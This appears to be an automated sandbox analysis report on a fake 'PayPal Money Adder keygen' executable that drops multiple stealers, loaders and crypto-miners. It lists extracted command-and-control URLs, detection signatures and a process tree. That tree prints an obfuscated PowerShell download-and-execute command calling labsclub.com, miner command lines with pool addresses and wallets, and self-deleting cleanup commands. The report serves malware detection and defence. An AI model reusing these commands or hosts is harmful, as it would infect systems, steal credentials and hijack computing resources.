Analysis
-
max time kernel
78s -
max time network
307s -
platform
windows10_x64 -
resource
win10v20201028 -
submitted
03-04-2021 07:46
Static task
static1
Behavioral task
behavioral1
Sample
Paypal_Money_Adder_serial_keygen_by_FUTURiTY.exe
Resource
win10v20201028
Behavioral task
behavioral2
Sample
Paypal_Money_Adder_serial_keygen_by_FUTURiTY.exe
Resource
win10v20201028
Behavioral task
behavioral3
Sample
Paypal_Money_Adder_serial_keygen_by_FUTURiTY.exe
Resource
win10v20201028
Behavioral task
behavioral4
Sample
Paypal_Money_Adder_serial_keygen_by_FUTURiTY.exe
Resource
win10v20201028
General
-
Target
Paypal_Money_Adder_serial_keygen_by_FUTURiTY.exe
Malware Config
Extracted
http://labsclub.com/welcome
Extracted
azorult
http://kvaka.li/1210776429.php
Extracted
fickerstealer
deniedfight.com:80
untouchablename.com:80
Extracted
metasploit
windows/single_exec
Extracted
redline
rimu
rlmushahel.xyz:80
Extracted
redline
02042021
panenewak.xyz:80
Extracted
smokeloader
2020
http://999080321newfolder1002002131-service1002.space/
http://999080321newfolder1002002231-service1002.space/
http://999080321newfolder3100231-service1002.space/
http://999080321newfolder1002002431-service1002.space/
http://999080321newfolder1002002531-service1002.space/
http://999080321newfolder33417-012425999080321.space/
http://999080321test125831-service10020125999080321.space/
http://999080321test136831-service10020125999080321.space/
http://999080321test147831-service10020125999080321.space/
http://999080321test146831-service10020125999080321.space/
http://999080321test134831-service10020125999080321.space/
http://999080321est213531-service1002012425999080321.ru/
http://999080321yes1t3481-service10020125999080321.ru/
http://999080321test13561-service10020125999080321.su/
http://999080321test14781-service10020125999080321.info/
http://999080321test13461-service10020125999080321.net/
http://999080321test15671-service10020125999080321.tech/
http://999080321test12671-service10020125999080321.online/
http://999080321utest1341-service10020125999080321.ru/
http://999080321uest71-service100201dom25999080321.ru/
http://999080321test61-service10020125999080321.website/
http://999080321test51-service10020125999080321.xyz/
http://999080321test41-service100201pro25999080321.ru/
http://999080321yest31-service100201rus25999080321.ru/
http://999080321rest21-service10020125999080321.eu/
http://999080321test11-service10020125999080321.press/
http://999080321newfolder4561-service10020125999080321.ru/
http://999080321rustest213-service10020125999080321.ru/
http://999080321test281-service10020125999080321.ru/
http://999080321test261-service10020125999080321.space/
http://999080321yomtest251-service10020125999080321.ru/
http://999080321yirtest231-service10020125999080321.ru/
Signatures
-
Azorult
An information stealer that was first discovered in 2016, targeting browsing history and passwords.
-
Glupteba Payload 3 IoCs
resource yara_rule behavioral2/memory/5264-213-0x0000000002500000-0x0000000002E0A000-memory.dmp family_glupteba behavioral2/memory/5264-215-0x0000000000400000-0x0000000000D24000-memory.dmp family_glupteba behavioral2/memory/5264-216-0x0000000000400000-0x0000000000D24000-memory.dmp family_glupteba -
MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 2 IoCs
resource yara_rule behavioral2/memory/7152-370-0x0000000000400000-0x0000000000430000-memory.dmp family_redline behavioral2/memory/6068-378-0x0000000000400000-0x0000000000430000-memory.dmp family_redline -
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Taurus Stealer Payload 1 IoCs
resource yara_rule behavioral2/memory/2596-291-0x0000000000400000-0x000000000587C000-memory.dmp family_taurus_stealer -
fickerstealer
Ficker is an infostealer written in Rust and ASM.
-
Vidar Stealer 4 IoCs
resource yara_rule behavioral2/memory/5156-208-0x0000000001920000-0x000000000196C000-memory.dmp Vidar behavioral2/memory/5156-210-0x0000000000400000-0x0000000000450000-memory.dmp Vidar behavioral2/memory/5852-528-0x0000000000400000-0x0000000000498000-memory.dmp Vidar behavioral2/memory/5852-527-0x00000000006C0000-0x0000000000757000-memory.dmp Vidar -
XMRig Miner Payload 4 IoCs
resource yara_rule behavioral2/memory/5520-182-0x0000000140000000-0x000000014070A000-memory.dmp xmrig behavioral2/memory/5520-185-0x00000001402CA898-mapping.dmp xmrig behavioral2/memory/5520-197-0x0000000140000000-0x000000014070A000-memory.dmp xmrig behavioral2/memory/5520-233-0x0000000140000000-0x000000014070A000-memory.dmp xmrig -
Downloads MZ/PE file
-
Executes dropped EXE 10 IoCs
pid Process 992 keygen-pr.exe 3976 keygen-step-1.exe 2156 keygen-step-3.exe 2072 keygen-step-4.exe 1360 key.exe 652 Setup.exe 1424 multitimer.exe 1376 setups.exe 2548 setups.tmp 2260 askinstall20.exe -
Loads dropped DLL 7 IoCs
pid Process 2548 setups.tmp 2548 setups.tmp 2548 setups.tmp 2548 setups.tmp 2548 setups.tmp 2548 setups.tmp 2548 setups.tmp -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 8 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 144 ipinfo.io 146 ipinfo.io 216 ip-api.com 279 api.ipify.org 288 ip-api.com 346 ipinfo.io 356 ipinfo.io 90 api.ipify.org -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 13 IoCs
pid pid_target Process procid_target 7920 5852 WerFault.exe 165 7624 5852 WerFault.exe 165 4420 5852 WerFault.exe 165 4632 5852 WerFault.exe 165 7612 5852 WerFault.exe 165 1368 5852 WerFault.exe 165 5080 5852 WerFault.exe 165 5364 5852 WerFault.exe 165 7648 5852 WerFault.exe 165 7524 5852 WerFault.exe 165 6952 5852 WerFault.exe 165 5416 5852 WerFault.exe 165 4360 5852 WerFault.exe 165 -
Delays execution with timeout.exe 1 IoCs
pid Process 2788 timeout.exe -
Kills process with taskkill 4 IoCs
pid Process 3668 taskkill.exe 5504 taskkill.exe 7596 taskkill.exe 1132 taskkill.exe -
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 askinstall20.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 5c0000000100000004000000000800000f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e askinstall20.exe -
Runs ping.exe 1 TTPs 3 IoCs
pid Process 6016 PING.EXE 5104 PING.EXE 2800 PING.EXE -
Script User-Agent 3 IoCs
Uses user-agent string associated with script host/environment.
description flow ioc HTTP User-Agent header 145 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 352 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 366 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 2548 setups.tmp 2548 setups.tmp -
Suspicious use of AdjustPrivilegeToken 36 IoCs
description pid Process Token: SeDebugPrivilege 652 Setup.exe Token: SeCreateTokenPrivilege 2260 askinstall20.exe Token: SeAssignPrimaryTokenPrivilege 2260 askinstall20.exe Token: SeLockMemoryPrivilege 2260 askinstall20.exe Token: SeIncreaseQuotaPrivilege 2260 askinstall20.exe Token: SeMachineAccountPrivilege 2260 askinstall20.exe Token: SeTcbPrivilege 2260 askinstall20.exe Token: SeSecurityPrivilege 2260 askinstall20.exe Token: SeTakeOwnershipPrivilege 2260 askinstall20.exe Token: SeLoadDriverPrivilege 2260 askinstall20.exe Token: SeSystemProfilePrivilege 2260 askinstall20.exe Token: SeSystemtimePrivilege 2260 askinstall20.exe Token: SeProfSingleProcessPrivilege 2260 askinstall20.exe Token: SeIncBasePriorityPrivilege 2260 askinstall20.exe Token: SeCreatePagefilePrivilege 2260 askinstall20.exe Token: SeCreatePermanentPrivilege 2260 askinstall20.exe Token: SeBackupPrivilege 2260 askinstall20.exe Token: SeRestorePrivilege 2260 askinstall20.exe Token: SeShutdownPrivilege 2260 askinstall20.exe Token: SeDebugPrivilege 2260 askinstall20.exe Token: SeAuditPrivilege 2260 askinstall20.exe Token: SeSystemEnvironmentPrivilege 2260 askinstall20.exe Token: SeChangeNotifyPrivilege 2260 askinstall20.exe Token: SeRemoteShutdownPrivilege 2260 askinstall20.exe Token: SeUndockPrivilege 2260 askinstall20.exe Token: SeSyncAgentPrivilege 2260 askinstall20.exe Token: SeEnableDelegationPrivilege 2260 askinstall20.exe Token: SeManageVolumePrivilege 2260 askinstall20.exe Token: SeImpersonatePrivilege 2260 askinstall20.exe Token: SeCreateGlobalPrivilege 2260 askinstall20.exe Token: 31 2260 askinstall20.exe Token: 32 2260 askinstall20.exe Token: 33 2260 askinstall20.exe Token: 34 2260 askinstall20.exe Token: 35 2260 askinstall20.exe Token: SeDebugPrivilege 1424 multitimer.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
pid Process 1376 setups.exe 2548 setups.tmp -
Suspicious use of WriteProcessMemory 46 IoCs
description pid Process procid_target PID 1308 wrote to memory of 3972 1308 Paypal_Money_Adder_serial_keygen_by_FUTURiTY.exe 78 PID 1308 wrote to memory of 3972 1308 Paypal_Money_Adder_serial_keygen_by_FUTURiTY.exe 78 PID 1308 wrote to memory of 3972 1308 Paypal_Money_Adder_serial_keygen_by_FUTURiTY.exe 78 PID 3972 wrote to memory of 992 3972 cmd.exe 81 PID 3972 wrote to memory of 992 3972 cmd.exe 81 PID 3972 wrote to memory of 992 3972 cmd.exe 81 PID 3972 wrote to memory of 3976 3972 cmd.exe 82 PID 3972 wrote to memory of 3976 3972 cmd.exe 82 PID 3972 wrote to memory of 3976 3972 cmd.exe 82 PID 3972 wrote to memory of 2156 3972 cmd.exe 83 PID 3972 wrote to memory of 2156 3972 cmd.exe 83 PID 3972 wrote to memory of 2156 3972 cmd.exe 83 PID 3972 wrote to memory of 2072 3972 cmd.exe 84 PID 3972 wrote to memory of 2072 3972 cmd.exe 84 PID 3972 wrote to memory of 2072 3972 cmd.exe 84 PID 992 wrote to memory of 1360 992 keygen-pr.exe 85 PID 992 wrote to memory of 1360 992 keygen-pr.exe 85 PID 992 wrote to memory of 1360 992 keygen-pr.exe 85 PID 2072 wrote to memory of 652 2072 keygen-step-4.exe 86 PID 2072 wrote to memory of 652 2072 keygen-step-4.exe 86 PID 2156 wrote to memory of 352 2156 keygen-step-3.exe 87 PID 2156 wrote to memory of 352 2156 keygen-step-3.exe 87 PID 2156 wrote to memory of 352 2156 keygen-step-3.exe 87 PID 352 wrote to memory of 2800 352 cmd.exe 89 PID 352 wrote to memory of 2800 352 cmd.exe 89 PID 352 wrote to memory of 2800 352 cmd.exe 89 PID 1360 wrote to memory of 2032 1360 key.exe 90 PID 1360 wrote to memory of 2032 1360 key.exe 90 PID 1360 wrote to memory of 2032 1360 key.exe 90 PID 652 wrote to memory of 1424 652 Setup.exe 91 PID 652 wrote to memory of 1424 652 Setup.exe 91 PID 652 wrote to memory of 1376 652 Setup.exe 92 PID 652 wrote to memory of 1376 652 Setup.exe 92 PID 652 wrote to memory of 1376 652 Setup.exe 92 PID 1376 wrote to memory of 2548 1376 setups.exe 93 PID 1376 wrote to memory of 2548 1376 setups.exe 93 PID 1376 wrote to memory of 2548 1376 setups.exe 93 PID 2072 wrote to memory of 2260 2072 keygen-step-4.exe 94 PID 2072 wrote to memory of 2260 2072 keygen-step-4.exe 94 PID 2072 wrote to memory of 2260 2072 keygen-step-4.exe 94 PID 2260 wrote to memory of 2160 2260 askinstall20.exe 96 PID 2260 wrote to memory of 2160 2260 askinstall20.exe 96 PID 2260 wrote to memory of 2160 2260 askinstall20.exe 96 PID 2160 wrote to memory of 3668 2160 cmd.exe 99 PID 2160 wrote to memory of 3668 2160 cmd.exe 99 PID 2160 wrote to memory of 3668 2160 cmd.exe 99
Processes
-
C:\Users\Admin\AppData\Local\Temp\Paypal_Money_Adder_serial_keygen_by_FUTURiTY.exe"C:\Users\Admin\AppData\Local\Temp\Paypal_Money_Adder_serial_keygen_by_FUTURiTY.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:1308 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen.bat" "2⤵
- Suspicious use of WriteProcessMemory
PID:3972 -
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-pr.exekeygen-pr.exe -p83fsase3Ge3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:992 -
C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe"4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1360 -
C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exeC:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe -txt -scanlocal -file:potato.dat5⤵PID:2032
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-1.exekeygen-step-1.exe3⤵
- Executes dropped EXE
PID:3976
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exekeygen-step-3.exe3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2156 -
C:\Windows\SysWOW64\cmd.execmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exe"4⤵
- Suspicious use of WriteProcessMemory
PID:352 -
C:\Windows\SysWOW64\PING.EXEping 1.1.1.1 -n 1 -w 30005⤵
- Runs ping.exe
PID:2800
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-4.exekeygen-step-4.exe3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2072 -
C:\Users\Admin\AppData\Local\Temp\RarSFX1\Setup.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\Setup.exe"4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:652 -
C:\Users\Admin\AppData\Local\Temp\PQW99WDBMU\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\PQW99WDBMU\multitimer.exe" 0 3060197d33d91c80.94013368 0 1015⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1424 -
C:\Users\Admin\AppData\Local\Temp\PQW99WDBMU\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\PQW99WDBMU\multitimer.exe" 1 3.1617436145.60681df1a5b9f 1016⤵PID:4540
-
C:\Users\Admin\AppData\Local\Temp\PQW99WDBMU\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\PQW99WDBMU\multitimer.exe" 2 3.1617436145.60681df1a5b9f7⤵PID:4732
-
C:\Users\Admin\AppData\Local\Temp\dqoqufshhva\cpyrix.exe"C:\Users\Admin\AppData\Local\Temp\dqoqufshhva\cpyrix.exe" /VERYSILENT8⤵PID:5212
-
C:\Users\Admin\AppData\Roaming\1.exeC:\Users\Admin\AppData\Roaming\1.exe9⤵PID:5340
-
C:\Windows\SysWOW64\at.exe"C:\Windows\System32\at.exe"10⤵PID:2080
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\Windows\System32\cmd.exe < Tre.pub10⤵PID:4936
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\System32\cmd.exe11⤵PID:5032
-
-
-
-
C:\Users\Admin\AppData\Roaming\2.exeC:\Users\Admin\AppData\Roaming\2.exe9⤵PID:5640
-
C:\Users\Admin\AppData\Roaming\2.exe"{path}"10⤵PID:6068
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\q2qutqull0m\bmvz55w10da.exe"C:\Users\Admin\AppData\Local\Temp\q2qutqull0m\bmvz55w10da.exe"8⤵PID:5240
-
C:\Windows\SysWOW64\cmd.execmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\q2qutqull0m\bmvz55w10da.exe"9⤵PID:6096
-
C:\Windows\SysWOW64\PING.EXEping 1.1.1.1 -n 1 -w 300010⤵
- Runs ping.exe
PID:5104
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\0m05zilycr4\app.exe"C:\Users\Admin\AppData\Local\Temp\0m05zilycr4\app.exe" /8-238⤵PID:5264
-
C:\Users\Admin\AppData\Local\Temp\0m05zilycr4\app.exe"C:\Users\Admin\AppData\Local\Temp\0m05zilycr4\app.exe" /8-239⤵PID:5708
-
-
-
C:\Users\Admin\AppData\Local\Temp\w0kn0ush4u5\vict.exe"C:\Users\Admin\AppData\Local\Temp\w0kn0ush4u5\vict.exe" /VERYSILENT /id=5358⤵PID:5204
-
C:\Users\Admin\AppData\Local\Temp\is-37EJV.tmp\vict.tmp"C:\Users\Admin\AppData\Local\Temp\is-37EJV.tmp\vict.tmp" /SL5="$4030C,870426,780800,C:\Users\Admin\AppData\Local\Temp\w0kn0ush4u5\vict.exe" /VERYSILENT /id=5359⤵PID:5448
-
C:\Users\Admin\AppData\Local\Temp\is-G49RD.tmp\win1host.exe"C:\Users\Admin\AppData\Local\Temp\is-G49RD.tmp\win1host.exe" 53510⤵PID:4104
-
C:\Users\Admin\AppData\Local\Temp\f1B9cNwta.exe"C:\Users\Admin\AppData\Local\Temp\f1B9cNwta.exe"11⤵PID:2084
-
C:\Users\Admin\AppData\Local\Temp\f1B9cNwta.exe"C:\Users\Admin\AppData\Local\Temp\f1B9cNwta.exe"12⤵PID:6540
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\425vi1sqwz0\Setup3310.exe"C:\Users\Admin\AppData\Local\Temp\425vi1sqwz0\Setup3310.exe" /Verysilent /subid=5778⤵PID:5184
-
-
C:\Users\Admin\AppData\Local\Temp\gn3tytwyllv\hq25nvhhwct.exe"C:\Users\Admin\AppData\Local\Temp\gn3tytwyllv\hq25nvhhwct.exe" /VERYSILENT8⤵PID:5172
-
C:\Users\Admin\AppData\Local\Temp\is-A4813.tmp\hq25nvhhwct.tmp"C:\Users\Admin\AppData\Local\Temp\is-A4813.tmp\hq25nvhhwct.tmp" /SL5="$40322,2592217,780800,C:\Users\Admin\AppData\Local\Temp\gn3tytwyllv\hq25nvhhwct.exe" /VERYSILENT9⤵PID:5408
-
C:\Users\Admin\AppData\Local\Temp\is-VM3FJ.tmp\winlthsth.exe"C:\Users\Admin\AppData\Local\Temp\is-VM3FJ.tmp\winlthsth.exe"10⤵PID:1548
-
C:\Users\Admin\AppData\Local\Temp\CYUtlay9B.exe"C:\Users\Admin\AppData\Local\Temp\CYUtlay9B.exe"11⤵PID:5232
-
C:\Users\Admin\AppData\Local\Temp\CYUtlay9B.exe"C:\Users\Admin\AppData\Local\Temp\CYUtlay9B.exe"12⤵PID:6948
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c start /B powershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#####-#ob#jec#t N#et#.W#eb#Cl#ie#nt#).###########Up#loa#dSt##########ri#ng(#''h#t#tp#:#//labsclub.com/#w#el#co#me''#,#''Cr#ys#ta#lP#ig''#############)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"11⤵PID:6436
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#####-#ob#jec#t N#et#.W#eb#Cl#ie#nt#).###########Up#loa#dSt##########ri#ng(#''h#t#tp#:#//labsclub.com/#w#el#co#me''#,#''Cr#ys#ta#lP#ig''#############)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"12⤵PID:6824
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\u1f22qd2mot\KiffApp1.exe"C:\Users\Admin\AppData\Local\Temp\u1f22qd2mot\KiffApp1.exe"8⤵PID:5164
-
-
C:\Users\Admin\AppData\Local\Temp\ormez3uppcm\ixbzwkn4vli.exe"C:\Users\Admin\AppData\Local\Temp\ormez3uppcm\ixbzwkn4vli.exe" /ustwo INSTALL8⤵PID:5156
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "ixbzwkn4vli.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\ormez3uppcm\ixbzwkn4vli.exe" & exit9⤵PID:5828
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "ixbzwkn4vli.exe" /f10⤵
- Kills process with taskkill
PID:5504
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\h31rqeec041\vpn.exe"C:\Users\Admin\AppData\Local\Temp\h31rqeec041\vpn.exe" /silent /subid=4828⤵PID:5476
-
C:\Users\Admin\AppData\Local\Temp\is-GK1MV.tmp\vpn.tmp"C:\Users\Admin\AppData\Local\Temp\is-GK1MV.tmp\vpn.tmp" /SL5="$103D6,15170975,270336,C:\Users\Admin\AppData\Local\Temp\h31rqeec041\vpn.exe" /silent /subid=4829⤵PID:5616
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\uninstall.bat" "10⤵PID:2280
-
C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exetapinstall.exe remove tap090111⤵PID:5712
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\install.bat" "10⤵PID:2112
-
C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exetapinstall.exe install OemVista.inf tap090111⤵PID:3572
-
-
-
C:\Program Files (x86)\MaskVPN\mask_svc.exe"C:\Program Files (x86)\MaskVPN\mask_svc.exe" uninstall10⤵PID:4452
-
-
C:\Program Files (x86)\MaskVPN\mask_svc.exe"C:\Program Files (x86)\MaskVPN\mask_svc.exe" install10⤵PID:6872
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\3nv03zqcyvz\IBInstaller_97039.exe"C:\Users\Admin\AppData\Local\Temp\3nv03zqcyvz\IBInstaller_97039.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs97039 -token mtn1co3fo4gs5vwq8⤵PID:6060
-
C:\Users\Admin\AppData\Local\Temp\is-63EMS.tmp\IBInstaller_97039.tmp"C:\Users\Admin\AppData\Local\Temp\is-63EMS.tmp\IBInstaller_97039.tmp" /SL5="$4030E,14574851,721408,C:\Users\Admin\AppData\Local\Temp\3nv03zqcyvz\IBInstaller_97039.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs97039 -token mtn1co3fo4gs5vwq9⤵PID:6132
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c expand C:\Users\Admin\AppData\Local\Temp\is-V513C.tmp\{app}\microsoft.cab -F:* %ProgramData%10⤵PID:5596
-
C:\Windows\SysWOW64\expand.exeexpand C:\Users\Admin\AppData\Local\Temp\is-V513C.tmp\{app}\microsoft.cab -F:* C:\ProgramData11⤵PID:4864
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1isgu2t0sll\z0w4vlmpdvy.exe"C:\Users\Admin\AppData\Local\Temp\1isgu2t0sll\z0w4vlmpdvy.exe" /quiet SILENT=1 AF=7568⤵PID:5420
-
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Weather\Weather 1.0.0\install\FD7DF1F\Weather Installation.msi" /quiet SILENT=1 AF=756 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\1isgu2t0sll\z0w4vlmpdvy.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\1isgu2t0sll\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1617176555 /quiet SILENT=1 AF=756 " AF="756" AI_CONTROL_VISUAL_STYLE="16578540;16578540;14988840;12422912"9⤵PID:5052
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\7SJJ9EQMVC\setups.exe"C:\Users\Admin\AppData\Local\Temp\7SJJ9EQMVC\setups.exe" ll5⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1376 -
C:\Users\Admin\AppData\Local\Temp\is-MUUP8.tmp\setups.tmp"C:\Users\Admin\AppData\Local\Temp\is-MUUP8.tmp\setups.tmp" /SL5="$801E2,635399,250368,C:\Users\Admin\AppData\Local\Temp\7SJJ9EQMVC\setups.exe" ll6⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:2548
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\askinstall20.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\askinstall20.exe"4⤵
- Executes dropped EXE
- Modifies system certificate store
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2260 -
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe5⤵
- Suspicious use of WriteProcessMemory
PID:2160 -
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe6⤵
- Kills process with taskkill
PID:3668
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\Full Program Features.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\Full Program Features.exe"4⤵PID:4580
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Program Files\unins.vbs"5⤵PID:4652
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" "C:\Program Files\unins0000.dll",install6⤵PID:4872
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\file.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\file.exe"4⤵PID:4720
-
C:\Users\Admin\AppData\Roaming\CAC3.tmp.exe"C:\Users\Admin\AppData\Roaming\CAC3.tmp.exe"5⤵PID:4916
-
C:\Users\Admin\AppData\Roaming\CAC3.tmp.exe"C:\Users\Admin\AppData\Roaming\CAC3.tmp.exe"6⤵PID:4876
-
-
-
C:\Users\Admin\AppData\Roaming\CD06.tmp.exe"C:\Users\Admin\AppData\Roaming\CD06.tmp.exe"5⤵PID:5056
-
C:\Windows\system32\msiexec.exe-P stratum1+ssl://0xb7633a80145Ec9ce2b8b5F80AB36C783064C2E10.work@eu-eth.hiveon.net:24443 -R --response-timeout 30 --farm-retries 999996⤵PID:2544
-
-
C:\Windows\system32\msiexec.exe-o pool.supportxmr.com:8080 -u 47wDrszce6VbnMB4zhhEA1Gr3EzwHx2eS6QzC5sFoq8iGdMjnzX8bnEjBdQHsAuW8C1SNgxyGa4DQTVnQ9jfhRod73np5P8 --cpu-max-threads-hint 50 -r 99996⤵PID:5520
-
-
-
